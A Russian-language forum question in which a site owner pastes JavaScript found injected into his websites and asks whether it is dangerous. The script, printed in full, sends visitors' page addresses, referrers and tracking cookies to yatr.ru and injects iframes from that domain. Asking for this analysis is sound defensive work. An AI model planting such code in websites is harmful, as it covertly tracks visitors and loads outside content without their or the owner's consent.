Я уже задавал вопрос на тостере, что обнаружил на своих сайтах код iframe содержащий отсылку на некий yatr.ru:
Что за зверь «yatr_scr» или «iframe yatr.ru»?
Собственно хотелось бы вернуться и обратиться к специалистам, шарящим за код.
Вот скрипт, который запускает iframe:
yatr.ru/js/hp.jsvar CallbackRegistry_hawk = {};
//var HoldTimer = null;
function getParameterByName(scr_id, name) {
var qstr=null;
if(typeof document.getElementById(scr_id) == 'undefined')
qstr = document.getElementById(scr_id).src;
else qstr = document.location.search;
name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"),
results = regex.exec(qstr);
return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
}
function get_request_hawk(url, onSuccess, onError) {
var loaded= false; // флаг, что вызов прошел успешно
var callbackName = 'f'+String(Math.random()).slice(2);
url += ~url.indexOf('?') ? '&' : '?';
url += 'callback=CallbackRegistry_hawk.'+callbackName;
var self=this;
//HoldTimer = setTimeout(function(){throw new Error();},1);
//----------------------------------------------------
CallbackRegistry_hawk[callbackName] = function(data) {
loaded = true;
delete CallbackRegistry_hawk[callbackName];
onSuccess(data);
};
function checkCallback() {
if (loaded) return;
delete CallbackRegistry_hawk[callbackName];
onError(url);
}
var script = document.createElement('script');
script.onreadystatechange = function() {
if (this.readyState == 'complete' || this.readyState == 'loaded'){
this.onreadystatechange = null;
setTimeout(checkCallback, 0);
}
};
//
script.onload = script.onerror = checkCallback;
script.src = url;
script.async = true;
document.body.appendChild(script);
}
function CHAWK()
{
this.domain = 'yatr.ru/';
this.protocol = 'http://';
this.host = this.protocol+this.domain;
//this.hold_timer = null;
//--------------------------------------------------------------------------------------------
this.init = function()
{
this.get();
var self=this;
}
//----------------------------------------------------------------------------------------------
this.get=function()
{
var dt = new Date();
var self= this;
var wm=getParameterByName('yatr_scr', 'wm');
var landing_page = (window.location != window.parent.location) ? document.referrer: document.location;
var referrer=getParameterByName('yatr_scr', 'referrer');
var sm=getParameterByName('yatr_scr', 'sm');
get_request_hawk(this.host+'hp.php?landing_page='+encodeURIComponent(landing_page)+'&wm='+wm+'&sm='+sm+'&hp_vid='+encodeURIComponent(this.get_cookie('hp_vid'))+'&ref='+encodeURIComponent(referrer)+'&r='+dt.getTime(),
function(data)
{
//clearTimeout(HoldTimer);
self.set_cookie('hp_segm', '', 0);
self.set_cookie('hp_aud', '', 0);
self.set_cookie('hp_vid', data.hp_vid, 365);
self.set_cookie('hp_sid', data.hp_sid, 0);
var res = data.segments.split("|");
var aud_res = data.audience.split("|");
var trg_res = data.target.split("|");
var aud_res_ = Array();
var trg_res_ = Array();
var aud_count_ = Array();
for (var i=0; i<aud_res.length; i++){
if( aud_res[i]!=''){
var tmp = aud_res[i].split(":");
aud_res_[tmp[0]]=tmp[1];
aud_count_[tmp[0]]=tmp[2];
}
}
for (var i=0; i<trg_res.length; i++){
if( trg_res[i]!=''){
var tmp = trg_res[i].split(":");
trg_res_[tmp[0]]=tmp[1];
}
}
for (var i=0; i<res.length; i++){
if( res[i]!=''){
var res_ = res[i].split(":");
var iurl = self.host+'frame.php?site_id='+data.site_id+'&site_name='+data.site+'&aud_id='+aud_res_[res_[0]]+'&aud_count='+aud_count_[res_[0]]+'&mish='+trg_res_[res_[0]]+'&segment='+res_[0]+'&count='+res_[1]+'&wm='+wm+'&vid='+data.hp_vid;
var iframe = document.createElement('iframe');
iframe.src = iurl;
document.body.appendChild(iframe);
var pos1=data.clients.indexOf(res_[0]+":")+ res_[0].length+1;
var pos2=data.clients.indexOf("|" ,data.clients.indexOf(res_[0]));
if(pos2<0) pos2 = data.clients.length;
var cnt=pos2-pos1;
var domain = data.clients.substr(pos1, cnt).split(":");
for(var di=0; di<domain.length; di++){
if(domain[di]!=''){
var iurl_ = self.protocol+domain[di]+"."+self.domain+'frame.php?site_id='+data.site_id+'&site_name='+data.site+'&aud_id='+aud_res_[res_[0]]+'&aud_count='+aud_count_[res_[0]]+'&mish='+trg_res_[res_[0]]+'&segment='+res_[0]+'&count='+res_[1]+'&wm='+wm+'&vid='+data.hp_vid;
var isubframe = document.createElement('iframe');
isubframe.src = iurl_;
document.body.appendChild(isubframe);
}
}
}
}
},
function(url){});
};
//----------------------------------------------------------------------------------------------
this.get_cookie = function (cookie_name)
{
var dc = document.cookie;
var prefix = cookie_name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) return -1;
}
else { begin += 2;}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {end = dc.length;}
return unescape(dc.substring(begin + prefix.length, end));
};
//----------------------------------------------------------------------------------------------
this.set_cookie = function (cookie_name, cookie_value, cookie_exp_days)
{
var today = new Date();
var expire = new Date();
var seconds = cookie_exp_days * 24 * 60 * 60 * 1000;
expire.setTime(today.getTime() + seconds);
if (cookie_exp_days == null || cookie_exp_days == 0) {document.cookie = cookie_name + "=" + escape(cookie_value); /* parent.document.cookie = cookie_name + "=" + escape(cookie_value); */}
else {document.cookie = cookie_name + "=" + escape(cookie_value) + ";expires=" + expire.toGMTString() + ";path=/"; /*parent.document.cookie = cookie_name + "=" + escape(cookie_value) + ";expires=" + expire.toGMTString() + ";path=/";*/ }
return cookie_value;
};
//----------------------------------------------------------------------------------------------
}
var HP = new CHAWK();
HP.init();
Является ли он опасным? Что он делает по сути?
